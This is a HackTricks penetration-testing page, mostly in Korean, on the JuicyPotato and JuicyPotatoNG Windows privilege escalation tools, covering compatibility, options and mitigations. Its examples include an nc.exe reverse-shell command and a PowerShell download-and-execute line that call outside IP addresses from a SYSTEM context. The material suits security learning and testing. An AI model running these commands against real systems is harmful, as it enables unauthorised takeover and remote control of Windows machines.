JuicyPotato

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

[!WARNING] > JuicyPotato๋Š” ๋ ˆ๊ฑฐ์‹œ์ž…๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ Windows 10 1803 / Windows Server 2016๊นŒ์ง€์˜ Windows ๋ฒ„์ „์—์„œ ์ž‘๋™ํ•ฉ๋‹ˆ๋‹ค. Microsoft๊ฐ€ Windows 10 1809 / Server 2019์—์„œ ๋„์ž…ํ•œ ๋ณ€๊ฒฝ์‚ฌํ•ญ๋“ค์€ ์›๋ž˜ ๊ธฐ๋ฒ•์„ ๊นจ๋œจ๋ ธ์Šต๋‹ˆ๋‹ค. ํ•ด๋‹น ๋นŒ๋“œ ๋ฐ ๊ทธ ์ดํ›„ ๋ฒ„์ „์—์„œ๋Š” PrintSpoofer, RoguePotato, SharpEfsPotato/EfsPotato, GodPotato ๋“ฑ๊ณผ ๊ฐ™์€ ์ตœ์‹  ๋Œ€์•ˆ์„ ๊ณ ๋ คํ•˜์‹ญ์‹œ์˜ค. ์ตœ์‹  ์˜ต์…˜๊ณผ ์‚ฌ์šฉ๋ฒ•์€ ์•„๋ž˜ ํŽ˜์ด์ง€๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Juicy Potato (๊ณจ๋“  ๊ถŒํ•œ ์•…์šฉ)

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM

You can download juicypotato from https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Compatibility quick notes

  • ํ˜„์žฌ ์ปจํ…์ŠคํŠธ์— SeImpersonatePrivilege ๋˜๋Š” SeAssignPrimaryTokenPrivilege๊ฐ€ ์žˆ๋Š” ๊ฒฝ์šฐ Windows 10 1803 ๋ฐ Windows Server 2016๊นŒ์ง€ ์‹ ๋ขฐ์„ฑ ์žˆ๊ฒŒ ๋™์ž‘ํ•ฉ๋‹ˆ๋‹ค.
  • Windows 10 1809 / Windows Server 2019 ์ดํ›„์˜ Microsoft ํ•˜๋“œ๋‹์œผ๋กœ ์ธํ•ด ๋™์ž‘ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ํ•ด๋‹น ๋นŒ๋“œ์—์„œ๋Š” ์œ„์— ๋งํฌ๋œ ๋Œ€์•ˆ๋“ค์„ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

Summary

From juicy-potato Readme:

RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

Windows ๋นŒ๋“œ ๋ฆฌ๋ทฐ ์ค‘์— BITS๊ฐ€ ์˜๋„์ ์œผ๋กœ ๋น„ํ™œ์„ฑํ™”๋˜์–ด ์žˆ๊ณ  ํฌํŠธ 6666๊ฐ€ ์‚ฌ์šฉ ์ค‘์ธ ์„ค์ •์„ ๋ฐœ๊ฒฌํ–ˆ์Šต๋‹ˆ๋‹ค.

We decided to weaponize [RottenPotatoNG]: Say hello to Juicy Potato.

์ด๋ก ์€ Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM๋ฅผ ์ฐธ์กฐํ•˜๊ณ  ๋งํฌ์™€ ์ฐธ์กฐ๋ฅผ ๋”ฐ๋ผ๊ฐ€์„ธ์š”.

We discovered that, other than BITS there are a several COM servers we can abuse. They just need to:

  1. ํ˜„์žฌ ์‚ฌ์šฉ์ž(์ผ๋ฐ˜์ ์œผ๋กœ โ€œservice userโ€๋กœ, impersonation ๊ถŒํ•œ์„ ๊ฐ€์ง„ ์‚ฌ์šฉ์ž)๊ฐ€ ์ธ์Šคํ„ด์Šคํ™”ํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  2. IMarshal ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ๊ตฌํ˜„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
  3. elevated user(SYSTEM, Administrator, โ€ฆ)๋กœ ์‹คํ–‰๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

After some testing we obtained and tested an extensive list of interesting CLSIDโ€™s on several Windows versions.

Juicy details

JuicyPotato allows you to:

  • Target CLSID ์›ํ•˜๋Š” CLSID๋ฅผ ์„ ํƒํ•˜์„ธ์š”. Here OS๋ณ„๋กœ ์ •๋ฆฌ๋œ ๋ชฉ๋ก์„ ์ฐพ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • COM Listening port ์›ํ•˜๋Š” COM ๋ฆฌ์Šค๋‹ ํฌํŠธ๋ฅผ ์ •์˜ํ•˜์„ธ์š” (๋งˆ์ƒฌ๋œ ํ•˜๋“œ์ฝ”๋”ฉ๋œ 6666 ๋Œ€์‹ ).
  • COM Listening IP address ์„œ๋ฒ„๋ฅผ ์›ํ•˜๋Š” IP์— ๋ฐ”์ธ๋“œํ•˜์„ธ์š”.
  • Process creation mode ์ž„์‹œ๋กœ ๊ฐ€์žฅ๋œ ์‚ฌ์šฉ์ž(impersonated user)์˜ ๊ถŒํ•œ์— ๋”ฐ๋ผ ๋‹ค์Œ ์ค‘ ์„ ํƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:
  • CreateProcessWithToken (needs SeImpersonate)
  • CreateProcessAsUser (needs SeAssignPrimaryToken)
  • both
  • Process to launch exploit ์„ฑ๊ณต ์‹œ ์‹คํ–‰ํ•  ์‹คํ–‰ ํŒŒ์ผ ๋˜๋Š” ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค.
  • Process Argument ์‹คํ–‰๋  ํ”„๋กœ์„ธ์Šค์˜ ์ธ์ˆ˜๋ฅผ ์ปค์Šคํ„ฐ๋งˆ์ด์ฆˆํ•ฉ๋‹ˆ๋‹ค.
  • RPC Server address ์€๋ฐ€ํ•œ ์ ‘๊ทผ์„ ์œ„ํ•ด ์™ธ๋ถ€ RPC ์„œ๋ฒ„์— ์ธ์ฆํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
  • RPC Server port ์™ธ๋ถ€ ์„œ๋ฒ„์— ์ธ์ฆํ•˜๋ ค ํ•˜๋Š”๋ฐ ๋ฐฉํ™”๋ฒฝ์ด ํฌํŠธ 135๋ฅผ ์ฐจ๋‹จํ•˜๋Š” ๊ฒฝ์šฐ ์œ ์šฉํ•ฉ๋‹ˆ๋‹คโ€ฆ
  • TEST mode ์ฃผ๋กœ ํ…Œ์ŠคํŠธ ๋ชฉ์ (์˜ˆ: CLSID ํ…Œ์ŠคํŠธ)์„ ์œ„ํ•œ ๋ชจ๋“œ์ž…๋‹ˆ๋‹ค. DCOM์„ ์ƒ์„ฑํ•˜๊ณ  ํ† ํฐ์˜ ์‚ฌ์šฉ์ž๋ฅผ ์ถœ๋ ฅํ•ฉ๋‹ˆ๋‹ค. ํ…Œ์ŠคํŠธ ๊ด€๋ จ ๋‚ด์šฉ์€ here for testing ์„ ์ฐธ์กฐํ•˜์„ธ์š”.

Usage 

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

์ตœ์ข… ๊ณ ์ฐฐ

From juicy-potato Readme:

์‚ฌ์šฉ์ž๊ฐ€ SeImpersonate ๋˜๋Š” SeAssignPrimaryToken ๊ถŒํ•œ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด ๋‹น์‹ ์€ SYSTEM ์ž…๋‹ˆ๋‹ค.

์ด ๋ชจ๋“  COM Servers์˜ ๋‚จ์šฉ์„ ์™„์ „ํžˆ ๋ง‰๋Š” ๊ฒƒ์€ ๊ฑฐ์˜ ๋ถˆ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. DCOMCNFG๋ฅผ ํ†ตํ•ด ํ•ด๋‹น ๊ฐ์ฒด๋“ค์˜ ๊ถŒํ•œ์„ ์ˆ˜์ •ํ•˜๋Š” ๊ฒƒ์„ ๊ณ ๋ คํ•  ์ˆ˜๋Š” ์žˆ์ง€๋งŒ, ์„ฑ๊ณตํ•˜๊ธฐ ์‰ฝ์ง€ ์•Š์„ ๊ฒƒ์ž…๋‹ˆ๋‹ค.

์‹ค์ œ ํ•ด๊ฒฐ์ฑ…์€ * SERVICE ๊ณ„์ •์œผ๋กœ ์‹คํ–‰๋˜๋Š” ๋ฏผ๊ฐํ•œ ๊ณ„์ •๊ณผ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๋ณดํ˜ธํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. DCOM์„ ์ค‘์ง€ํ•˜๋ฉด ์ด ์ต์Šคํ”Œ๋กœ์ž‡์„ ์–ต์ œํ•  ์ˆ˜๋Š” ์žˆ๊ฒ ์ง€๋งŒ, ๊ธฐ๋ณธ OS์— ์‹ฌ๊ฐํ•œ ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

From: http://ohpe.it/juicy-potato/

JuicyPotatoNG (2022+)

JuicyPotatoNG๋Š” ๋‹ค์Œ์„ ๊ฒฐํ•ฉํ•˜์—ฌ ์ตœ์‹  Windows์—์„œ JuicyPotato ์Šคํƒ€์ผ์˜ local privilege escalation์„ ์žฌ๋„์ž…ํ•ฉ๋‹ˆ๋‹ค:

  • DCOM OXID resolution์„ ์„ ํƒํ•œ ํฌํŠธ์˜ ๋กœ์ปฌ RPC server๋กœ ์ˆ˜ํ–‰ํ•˜์—ฌ, ์ด์ „์— ํ•˜๋“œ์ฝ”๋”ฉ๋œ 127.0.0.1:6666 ๋ฆฌ์Šค๋„ˆ๋ฅผ ํ”ผํ•จ.
  • SSPI hook์„ ํ†ตํ•ด RpcImpersonateClient๋ฅผ ์š”๊ตฌํ•˜์ง€ ์•Š๊ณ  ๋“ค์–ด์˜ค๋Š” SYSTEM ์ธ์ฆ์„ ์บก์ฒ˜ํ•˜๊ณ  ๊ฐ€์žฅ(impersonate)ํ•จ. ์ด๋Š” ๋˜ํ•œ SeAssignPrimaryTokenPrivilege๋งŒ ์žˆ๋Š” ๊ฒฝ์šฐ์—๋„ CreateProcessAsUser๋ฅผ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•จ.
  • DCOM activation ์ œ์•ฝ์„ ๋งŒ์กฑ์‹œํ‚ค๊ธฐ ์œ„ํ•œ ํŠธ๋ฆญ๋“ค(์˜ˆ: PrintNotify / ActiveX Installer Service ํด๋ž˜์Šค๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•  ๋•Œ ์ด์ „์˜ INTERACTIVE-group ์š”๊ตฌ์‚ฌํ•ญ).

์ค‘์š” ์ฐธ๊ณ ์‚ฌํ•ญ (๋นŒ๋“œ๋ณ„ ๋™์ž‘ ๋ณ€ํ™”):

  • September 2022: ์ดˆ๊ธฐ ๊ธฐ๋ฒ•์€ โ€œINTERACTIVE trickโ€์„ ์‚ฌ์šฉํ•˜์—ฌ ์ง€์›๋˜๋Š” Windows 10/11 ๋ฐ Server ๋Œ€์ƒ์—์„œ ๋™์ž‘ํ•จ.
  • January 2023 update from the authors: Microsoft๊ฐ€ ์ดํ›„ INTERACTIVE trick์„ ์ฐจ๋‹จํ•จ. ๋‹ค๋ฅธ CLSID ({A9819296-E5B3-4E67-8226-5E72CE9E1FB7})๊ฐ€ ์ต์Šคํ”Œ๋กœ์ž‡์„ ๋ณต์›ํ•˜์ง€๋งŒ, ๊ฒŒ์‹œ๋ฌผ์— ๋”ฐ๋ฅด๋ฉด ์ด๋Š” Windows 11 / Server 2022์—์„œ๋งŒ ์ž‘๋™ํ•จ.

Basic usage (more flags in the help):

JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
# Useful helpers:
#  -b  Bruteforce all CLSIDs (testing only; spawns many processes)
#  -s  Scan for a COM port not filtered by Windows Defender Firewall
#  -i  Interactive console (only with CreateProcessAsUser)

Windows 10 1809 / Server 2019์—์„œ ํด๋ž˜์‹ JuicyPotato๊ฐ€ ํŒจ์น˜๋œ ๊ฒฝ์šฐ, ๋งจ ์œ„์— ๋งํฌ๋œ ๋Œ€์•ˆ๋“ค(RoguePotato, PrintSpoofer, EfsPotato/GodPotato ๋“ฑ)์„ ์šฐ์„  ์‚ฌ์šฉํ•˜์„ธ์š”. NG๋Š” ๋นŒ๋“œ ๋ฐ ์„œ๋น„์Šค ์ƒํƒœ์— ๋”ฐ๋ผ ์ƒํ™ฉ์— ๋”ฐ๋ผ ๋‹ค๋ฅผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์˜ˆ์ œ

์ฐธ๊ณ : ์‹œ๋„ํ•ด๋ณผ CLSID ๋ชฉ๋ก์€ this page์—์„œ ํ™•์ธํ•˜์„ธ์š”.

nc.exe reverse shell ์–ป๊ธฐ

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell ๋ฆฌ๋ฒ„์Šค

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Launch a new CMD (if you have RDP access)

CLSID Problems

์ข…์ข… JuicyPotato๊ฐ€ ์‚ฌ์šฉํ•˜๋Š” ๊ธฐ๋ณธ CLSID๋Š” ์ž‘๋™ํ•˜์ง€ ์•Š์•„์„œ ์ต์Šคํ”Œ๋กœ์ž‡์ด ์‹คํŒจํ•ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์ž‘๋™ํ•˜๋Š” CLSID๋ฅผ ์ฐพ๊ธฐ ์œ„ํ•ด ์—ฌ๋Ÿฌ ๋ฒˆ ์‹œ๋„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ํŠน์ • ์šด์˜์ฒด์ œ์—์„œ ์‹œ๋„ํ•  CLSID ๋ชฉ๋ก์„ ์–ป์œผ๋ ค๋ฉด ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ๋ฐฉ๋ฌธํ•˜์„ธ์š”:

Checking CLSIDs

๋จผ์ €, juicypotato.exe ์™ธ์— ๋ช‡ ๊ฐ€์ง€ ์‹คํ–‰ ํŒŒ์ผ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

Join-Object.ps1๋ฅผ ๋‹ค์šด๋กœ๋“œํ•ด PS ์„ธ์…˜์— ๋กœ๋“œํ•˜๊ณ , GetCLSID.ps1๋ฅผ ๋‹ค์šด๋กœ๋“œํ•˜์—ฌ ์‹คํ–‰ํ•˜์„ธ์š”. ํ•ด๋‹น ์Šคํฌ๋ฆฝํŠธ๋Š” ํ…Œ์ŠคํŠธํ•  ์ˆ˜ ์žˆ๋Š” CLSID ๋ชฉ๋ก์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

๊ทธ๋‹ค์Œ test_clsid.bat ์„ ๋‹ค์šด๋กœ๋“œ(ํด๋ž˜์ŠคID ๋ชฉ๋ก๊ณผ juicypotato ์‹คํ–‰ ํŒŒ์ผ์˜ ๊ฒฝ๋กœ๋ฅผ ๋ณ€๊ฒฝํ•˜์„ธ์š”)ํ•˜๊ณ  ์‹คํ–‰ํ•˜์„ธ์š”. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ๋ชจ๋“  CLSID๋ฅผ ์ฐจ๋ก€๋กœ ์‹œ๋„ํ•˜๊ธฐ ์‹œ์ž‘ํ•˜๋ฉฐ, ํฌํŠธ ๋ฒˆํ˜ธ๊ฐ€ ๋ณ€๊ฒฝ๋˜๋ฉด ๊ทธ CLSID๊ฐ€ ์ž‘๋™ํ–ˆ๋‹ค๋Š” ์˜๋ฏธ์ž…๋‹ˆ๋‹ค.

-c ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ž‘๋™ํ•˜๋Š” CLSID๋ฅผ ํ™•์ธํ•˜์„ธ์š”

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ